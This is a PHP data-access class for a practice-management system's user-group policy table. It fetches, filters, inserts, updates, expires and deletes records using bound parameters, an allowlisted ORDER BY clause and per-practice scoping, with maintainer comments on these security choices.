m_usr_groups.php
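<?php
/**
 * User Production PMS Class
 *
 * Data-access model for the `users_groups` table. Every row belongs to a
 * practice (`practiceID`), and the current practice is read from
 * $_SESSION['PID'] on each call. The user being edited is read from
 * $_SESSION['edit_id'] wherever the "previous policy" is looked up.
 *
 * Security notes for maintainers:
 *  - All values reach the database through bound parameters. The only
 *    dynamic SQL fragment is the ORDER BY clause, which cannot be bound and
 *    is therefore rebuilt from an allowlist in build_order_by().
 *  - Writes keyed by usrGroupID / userID are also scoped to the session's
 *    practiceID, so an id taken from a request cannot touch another
 *    practice's rows.
 *  - The old debug `$query` strings (raw concatenation of session/POST values,
 *    used only by commented-out echo statements) were removed; one of them
 *    read `$zero` before it was assigned.
 */
class User_Groups
{
    /** ORDER BY clause used when the caller supplies nothing usable. */
    private const DEFAULT_ORDER_BY = '`effectiveTS`';

    /**
     * Columns that may appear in ORDER BY (lower-case lookup => canonical name).
     * These are the six columns this class reads or writes.
     */
    private const SORTABLE_COLUMNS = [
        'usrgroupid'  => 'usrGroupID',
        'practiceid'  => 'practiceID',
        'userid'      => 'userID',
        'groupdata'   => 'groupData',
        'effectivets' => 'effectiveTS',
        'expirets'    => 'expireTS',
    ];

    private $Database;
    private $db_table = 'users_groups';

    public function __construct()
    {
        // The mysqli-style connection is provided as a global by the application.
        global $Database;
        $this->Database = $Database;
    }

    /**
     * Turn a caller-supplied sort expression into a safe ORDER BY clause.
     *
     * Accepts a comma-separated list of `column [ASC|DESC]` terms (backticks
     * optional). If any term is not an allowlisted column with an optional
     * direction, the whole expression is discarded and the default is used,
     * so no caller-controlled text is ever concatenated into the statement.
     *
     * @param mixed $sortOrder Raw sort expression ('' selects the default).
     * @return string ORDER BY body built only from allowlisted identifiers.
     */
    private function build_order_by($sortOrder): string
    {
        $terms = [];
        foreach (explode(',', (string) $sortOrder) as $rawTerm) {
            if (preg_match('/^\s*`?([A-Za-z_]+)`?\s*(ASC|DESC)?\s*$/i', $rawTerm, $m) !== 1) {
                return self::DEFAULT_ORDER_BY;
            }
            $lookup = strtolower($m[1]);
            if (!isset(self::SORTABLE_COLUMNS[$lookup])) {
                return self::DEFAULT_ORDER_BY;
            }
            $direction = strtoupper($m[2] ?? '');
            $terms[] = '`' . self::SORTABLE_COLUMNS[$lookup] . '`'
                . ($direction !== '' ? ' ' . $direction : '');
        }

        return implode(', ', $terms);
    }

    /**
     * Fetch every group record of the current practice.
     *
     * NOTE(review): rows are keyed by userID, so when a user has several
     * records only the last one fetched survives. Callers below index the
     * filtered result with [1] to find an older record, which this keying
     * looks like it prevents - confirm before relying on history lookups.
     * The key is left unchanged because external callers may depend on it.
     *
     * @param mixed $sortOrder Sort expression; validated by build_order_by().
     * @return array Map of userID => row; empty when the statement cannot be prepared.
     */
    public function get_all($sortOrder)
    {
        $data = [];

        $sql = 'SELECT * FROM `' . $this->db_table . '` WHERE `practiceID` = ? ORDER BY '
            . $this->build_order_by($sortOrder);

        $stmt = $this->Database->prepare($sql);
        if (!$stmt) {
            // Previously fell through and returned null, which broke foreach in search().
            return $data;
        }

        $stmt->bind_param('i', $_SESSION['PID']);
        $stmt->execute();
        $stmt->store_result();
        $stmt->bind_result($usrGroupID, $practiceID, $userID, $groupData, $effectiveTS, $expireTS);

        while ($stmt->fetch()) {
            $data[$userID] = [
                'usrGroupID'  => $usrGroupID,
                'practiceID'  => $practiceID,
                'userID'      => $userID,
                'groupData'   => $groupData,
                'effectiveTS' => $effectiveTS,
                'expireTS'    => $expireTS,
            ];
        }

        // The original closed the statement after `return`, so it never ran.
        $stmt->close();

        return $data;
    }

    /**
     * Filter the practice's group records.
     *
     * @param mixed $userID     Keep only this user when > 0.
     * @param mixed $t1         Window start; with $t2 <= 0, drops records that expired before $t1.
     * @param mixed $t2         Window end; with $t1 > 0, drops records not active between $t1 and $t2.
     * @param mixed $usrGroupID Keep only this record when > 0.
     * @param mixed $sortOrder  Sort expression passed to get_all().
     * @return array|null A single row (or null when none matched) if $usrGroupID > 0,
     *                    otherwise a re-indexed list of rows.
     */
    public function search($userID, $t1, $t2, $usrGroupID, $sortOrder)
    {
        $rows = $this->get_all($sortOrder);

        foreach ($rows as $key => $row) {
            if ($userID > 0 && $row['userID'] != $userID) {
                unset($rows[$key]);
                continue;
            }
            if ($usrGroupID > 0 && $row['usrGroupID'] != $usrGroupID) {
                unset($rows[$key]);
                continue;
            }

            // An expireTS of 0 means "still open"; only positive values can be in the past.
            $expiredBeforeT1 = $row['expireTS'] > 0 && $row['expireTS'] < $t1;

            if ($t1 > 0 && $t2 <= 0) {
                // Open-ended window: drop records that expired before t1.
                $drop = $expiredBeforeT1;
            } elseif ($t1 > 0 && $t2 > 0) {
                // Closed window: drop records not active at any time from t1 to t2.
                // The original relied on && binding tighter than ||; the grouping is
                // now explicit and gives the same result for numeric timestamps.
                $drop = $row['effectiveTS'] >= $t2 || $expiredBeforeT1;
            } else {
                $drop = false;
            }

            if ($drop) {
                unset($rows[$key]);
            }
        }

        if ($usrGroupID > 0) {
            // Return null rather than indexing an empty array with a null key.
            return $rows === [] ? null : reset($rows);
        }

        return array_values($rows);
    }

    /**
     * Insert a new group record ($usrGroupID <= 0) or update an existing one.
     *
     * On insert, the most recent existing record of $_SESSION['edit_id'] is
     * expired one second before the new record becomes effective. On update,
     * when the effective date changed, the record before it is re-expired the
     * same way. The outcome is reported through Template::set_alert().
     *
     * @param mixed $usrGroupID   Record to update, or <= 0 to insert.
     * @param mixed $userID       Owner of a newly inserted record.
     * @param mixed $groupData    Group payload, bound as a string.
     * @param mixed $effectiveTS  New effective timestamp.
     * @param mixed $xEffectiveTS Effective timestamp before the edit (update only).
     * @return void
     */
    public function add_mod($usrGroupID, $userID, $groupData, $effectiveTS, $xEffectiveTS)
    {
        $Template = new Template;

        if ($usrGroupID <= 0) {
            // insert
            $expireTS = 0;

            // Expire the most recent existing policy; `?? null` avoids an
            // undefined-offset notice when the user has no policy yet.
            $history = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC');
            $previous_policy = $history[0] ?? null;
            if (isset($previous_policy['usrGroupID'])) {
                $this->update_expire($previous_policy['usrGroupID'], $effectiveTS - 1);
            }

            $stmt = $this->Database->prepare(
                'INSERT INTO ' . $this->db_table
                . ' (practiceID, userID, groupData, effectiveTS, expireTS) VALUES (?,?,?,?,?)'
            );
            if ($stmt) {
                $stmt->bind_param('iisii', $_SESSION['PID'], $userID, $groupData, $effectiveTS, $expireTS);
                if ($stmt->execute()) {
                    $Template->set_alert("Group data added", 'success');
                } else {
                    $Template->set_alert("ERROR: Record NOT added", 'error');
                }
                $stmt->close();
            } else {
                $Template->set_alert("ERROR: Could not prepare mysqli statement. m_usr_groups " . __LINE__, 'error');
            }

            return;
        }

        // update
        if ($xEffectiveTS != $effectiveTS) {
            // Effective date was changed -> the policy before this one needs a new expiry.
            $history = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC');
            $previous_policy = $history[1] ?? null;
            if (isset($previous_policy['usrGroupID'])) {
                $this->update_expire($previous_policy['usrGroupID'], $effectiveTS - 1);
            }
        }

        $stmt = $this->Database->prepare(
            'UPDATE ' . $this->db_table
            . ' SET groupData = ?, effectiveTS = ? WHERE usrGroupID = ? and practiceID = ?'
        );
        if ($stmt) {
            $stmt->bind_param('siii', $groupData, $effectiveTS, $usrGroupID, $_SESSION['PID']);
            if ($stmt->execute()) {
                $Template->set_alert("Changes saved", 'success');
            } else {
                $Template->set_alert("ERROR: Changes NOT saved", 'error');
            }
            $stmt->close();
        } else {
            $Template->set_alert("ERROR: Could not prepare mysqli statement. m_usr_groups " . __LINE__, 'error');
        }
    }

    /**
     * Set the expiry timestamp of one record, or of the open record(s)
     * (expireTS = 0) of $_SESSION['edit_id'] when $usrGroupID is not positive.
     *
     * Both statements are limited to the session's practice, matching the
     * scoping already used by the UPDATE in add_mod().
     *
     * @param mixed $usrGroupID Record to expire, or <= 0 to target the edited user's open record.
     * @param mixed $expireTS   New expiry timestamp (0 re-opens the record).
     * @return void
     */
    public function update_expire($usrGroupID, $expireTS)
    {
        $Template = new Template;

        if ($usrGroupID > 0) {
            $stmt = $this->Database->prepare(
                'UPDATE ' . $this->db_table
                . ' SET expireTS = ? WHERE usrGroupID = ? AND practiceID = ?'
            );
            if ($stmt) {
                $stmt->bind_param('iii', $expireTS, $usrGroupID, $_SESSION['PID']);
                $stmt->execute();
                $stmt->close();
            } else {
                $Template->set_alert("ERROR: could not prepare SQLi statement." . __LINE__ . "-m_usr_groups", 'error');
            }

            return;
        }

        // bind_param() takes references, so the literal needs a variable.
        $zero = 0;
        $stmt = $this->Database->prepare(
            'UPDATE ' . $this->db_table
            . ' SET expireTS = ? WHERE userID = ? and expireTS = ? AND practiceID = ?'
        );
        if ($stmt) {
            $stmt->bind_param('iiii', $expireTS, $_SESSION['edit_id'], $zero, $_SESSION['PID']);
            $stmt->execute();
            $stmt->close();
        } else {
            $Template->set_alert("ERROR: could not prepare SQLi statement." . __LINE__ . "-m_usr_groups", 'error');
        }
    }

    /**
     * Delete one record by id, or every record of a user in the current practice.
     *
     * When deleting by id, the expiry of the edited user's previous policy is
     * cleared first so that it becomes the open policy again.
     *
     * @param mixed $usrGroupID Record to delete when > 0.
     * @param mixed $userID     Otherwise, user whose records are deleted when > 0.
     * @return bool True when the DELETE executed; false when it failed, could
     *              not be prepared, or neither id was given (the original
     *              returned null in the last two cases).
     */
    public function delete($usrGroupID, $userID)
    {
        if ($usrGroupID > 0) {
            // == remove expiry date of previous policy ========
            $history = $this->search($_SESSION['edit_id'], '', '', '', 'effectiveTS DESC');
            $previous_policy = $history[1] ?? null;
            if (isset($previous_policy['usrGroupID'])) {
                $this->update_expire($previous_policy['usrGroupID'], '0');
            }

            // Scoped to the practice: the id alone is not proof of ownership.
            $stmt = $this->Database->prepare(
                'DELETE FROM ' . $this->db_table . ' WHERE usrGroupID = ? AND practiceID = ?'
            );
            if (!$stmt) {
                return false;
            }
            $stmt->bind_param('ii', $usrGroupID, $_SESSION['PID']);
            $deleted = (bool) $stmt->execute();
            $stmt->close();

            return $deleted;
        }

        if ($userID > 0) {
            $stmt = $this->Database->prepare(
                'DELETE FROM ' . $this->db_table . ' WHERE userID=? AND practiceID = ?'
            );
            if (!$stmt) {
                return false;
            }
            $stmt->bind_param('ii', $userID, $_SESSION['PID']);
            $deleted = (bool) $stmt->execute();
            $stmt->close();

            return $deleted;
        }

        return false;
    }
}
?>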